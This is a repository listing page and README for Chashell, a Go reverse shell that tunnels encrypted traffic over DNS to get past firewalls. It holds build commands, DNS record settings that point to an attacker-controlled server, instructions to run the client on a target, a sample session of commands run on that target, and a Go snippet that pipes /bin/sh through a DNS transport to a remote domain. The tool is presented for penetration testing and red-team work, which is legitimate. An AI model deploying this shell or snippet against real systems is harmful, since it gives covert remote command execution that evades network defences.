https://github.com/sysdream/chashell

Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.
https://github.com/sysdream/chashell

infosec pentest redteam reverse-shell

Last synced: about 1 month ago
JSON representation

Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.

• Host: GitHub
• URL: https://github.com/sysdream/chashell
• Owner: sysdream
• Created: 2019-02-15T14:54:48.000Z (over 5 years ago)
• Default Branch: master
• Last Pushed: 2022-04-05T17:22:14.000Z (about 2 years ago)
• Last Synced: 2024-03-26T17:20:58.437Z (3 months ago)
• Topics: infosec, pentest, redteam, reverse-shell
• Language: Go
• Homepage:
• Size: 138 KB
• Stars: 1,014
• Watchers: 22
• Forks: 128
• Open Issues: 4
• Metadata Files:
  • Readme: README.md

Lists

• awesome-go-security - chashell - Chashell is a Go reverse shell that communicates over DNS. (Command and Control)
• awesome-hacking-lists - chashell - Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks. (Go (531))
• my-awesome-stars - chashell
• cybersecurity-golang-security - chashell - Chashell is a Go reverse shell that communicates over DNS. (Command and Control)
• awesome-cyber-security - **567**星
• awesome - chashell - Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks. (Go)
• awesome-stars - sysdream/chashell - Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks. (redteam)
• awesome-stars - sysdream/chashell - `★1029` Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks. (Go)
• awesome-hacking-lists - sysdream/chashell - Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks. (Go)
• awesome-cyber-security - **545**星

README

        
# Chashell

## Reverse Shell over DNS

Chashell is a [Go](https://golang.org/) reverse shell that communicates over DNS. 

It can be used to bypass firewalls or tightly restricted networks.

It comes with a multi-client control server, named `chaserv`.

![Chaserv](img/chaserv.gif)

### Communication security

Every packet is encrypted using symmetric cryptography ([XSalsa20](https://en.wikipedia.org/wiki/Salsa20) + [Poly1305](https://en.wikipedia.org/wiki/Poly1305)), with a shared key between the client

and the server.

We plan to implement asymmetric cryptography in the future.

### Protocol

Chashell communicates using [Protocol Buffers](https://developers.google.com/protocol-buffers/) serialized messages. For reference, the Protocol Buffers structure (`.proto` file) is available in the `proto` folder.

Here is a (simplified) communication chart :

![Protocol](img/proto.png)

Keep in mind that every packet is encrypted, hex-encoded and then packed for DNS transportation.

### Supported systems

Chashell should work with any desktop system (Windows, Linux, Darwin, BSD variants) that is supported by the Go compiler.

We tested those systems and it works without issues :

* Windows (386/amd64)

* Linux (386/amd64/arm64)

* OS X (386/amd64)

### How to use Chaserv/Chashell

#### Building

Make sure the [GOPATH](https://github.com/golang/go/wiki/GOPATH) environment variable is correctly configured before running these commands.

Build all the binaries (adjust the domain_name and the encryption_key to your needs):

```

$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')

$ export DOMAIN_NAME=c.sysdream.com

$ make build-all

```

Build for a specific platform:

```

$ make build-all OSARCH="linux/arm"

```

Build only the server:

```

$ make build-server

```

Build only the client (*chashell* itself):

```

$ make build-client

```

#### DNS Settings

* Buy and configure a domain name of your choice (preferably short).

* Set a DNS record like this : 

```

chashell 300 IN A [SERVERIP]

c 300 IN NS chashell.[DOMAIN].

```

#### Usage

Basically, on the server side (attacker's computer), you must use the `chaserv` binary. For the client side (i.e the target), use the `chashell` binary.

So:

* Run `chaserv` on the control server.

* Run `chashell` on the target computer.

The client should now connect back to `chaserv`:

```

[n.chatelain]$ sudo ./chaserv

chashell >>> New session : 5c54404419e59881dfa3a757

chashell >>> sessions 5c54404419e59881dfa3a757

Interacting with session 5c54404419e59881dfa3a757.

whoami

n.chatelain

ls /

bin

boot

dev

[...]

usr

var

```

Use the `sessions [sessionid]` command to interact with a client.

When interacting with a session, you can use the `background` command in order to return to the `chashell` prompt.

Use the `exit` command to close `chaserv`.

## Implement your own

The `chashell/lib/transport` library is compatible with the `io.Reader` / `io.Writer` interface. So, implementing a reverse shell is as easy as :

```go

cmd := exec.Command("/bin/sh")

dnsTransport := transport.DNSStream(targetDomain, encryptionKey)

cmd.Stdout = dnsTransport

cmd.Stderr = dnsTransport

cmd.Stdin = dnsTransport

cmd.Run()

```

## Debugging

For more verbose messages, add `TAGS=debug` at the end of the make command.

## To Do

* Implement asymmetric cryptography ([Curve25519](https://en.wikipedia.org/wiki/Curve25519), [XSalsa20](https://en.wikipedia.org/wiki/Salsa20) and [Poly1305](https://en.wikipedia.org/wiki/Poly1305))

* Retrieve the host name using the `InfoPacket` message.

* Create a *proxy/relay* tool in order to tunnel TCP/UDP streams (Meterpreter over DNS !).

* Better error handling.

* Get rid of dependencies.

## Credits

* Nicolas Chatelain